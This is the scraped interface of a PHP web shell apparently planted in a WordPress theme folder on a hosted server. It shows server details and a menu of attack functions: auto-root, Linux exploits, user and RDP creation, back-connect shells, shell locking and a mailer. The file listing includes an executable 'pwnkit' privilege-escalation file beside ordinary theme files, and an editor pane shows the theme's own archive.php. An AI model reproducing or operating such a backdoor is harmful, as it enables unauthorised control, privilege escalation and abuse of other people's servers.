Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
blue-taste /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
331
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.98
KB
-rw-r--r--
comments.php
1.49
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
dd_ie.js
568
B
-rw-r--r--
footer.php
563
B
-rw-r--r--
functions.php
1.46
KB
-rw-r--r--
functionsbak.php
995
B
-rw-r--r--
header.php
1.89
KB
-rw-r--r--
index.php
2.18
KB
-rw-r--r--
license.txt
15.05
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
47.83
KB
-rw-r--r--
search.php
1.62
KB
-rw-r--r--
searchform.php
377
B
-rw-r--r--
sidebar.php
812
B
-rw-r--r--
style.css
13.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive.php
<?php /* * Blue Taste Wordpress Theme By Jabox (http://www.jabox.com.ar) */ ?> <?php get_header(); ?> <div id="content"> <?php if (have_posts()) : ?> <h2>Archive</h2> <?php if ( is_404() || is_category() || is_day() || is_month() || is_year() || is_paged() ) { ?> <?php if (is_404()) { ?> <?php } elseif (is_category()) { ?> <h3>For the <?php single_cat_title(''); ?> category</h3> <?php } elseif (is_day()) { ?> <h3>For the day <?php the_time('l, F jS, Y'); ?></h3> <?php } elseif (is_month()) { ?> <h3>For <?php the_time('F, Y'); ?></h3> <?php } elseif (is_year()) { ?> <h3>For the year <?php the_time('Y'); ?></h3> <?php } elseif (isset($_GET['paged']) && !empty($_GET['paged'])) { ?> <h3>The blog archives.</h3> <?php } ?> <?php }?> <div class="separator"></div> <?php while (have_posts()) : the_post(); ?> <div class="post-container"> <div id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <div class="post-title"> <?php if (!is_page()) { ?><div class="post-date"><span class="post-month"><?php the_time('M') ?></span> <span class="post-day"><?php the_time('d') ?></span></div> <?php } ?> <h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2> <?php if (!is_page()) { ?><span class="post-dates">By <?php the_author(); ?></span><span class="post-comments"><?php comments_popup_link('No Comments', '1 Comment', '% Comments'); ?></span><?php } ?> </div> <div class="entry"> <?php the_content('Continue reading this entry »'); ?> </div> </div> </div> <div class="separator"></div> <?php endwhile; ?> <div class="navigation-down"><span class="previous-entries"><?php next_posts_link('< Older') ?></span><span class="next-entries"><?php previous_posts_link('Newer >') ?></span> </div> <?php endif; ?> </div> <?php get_sidebar(); ?> <?php get_footer(); ?>
Close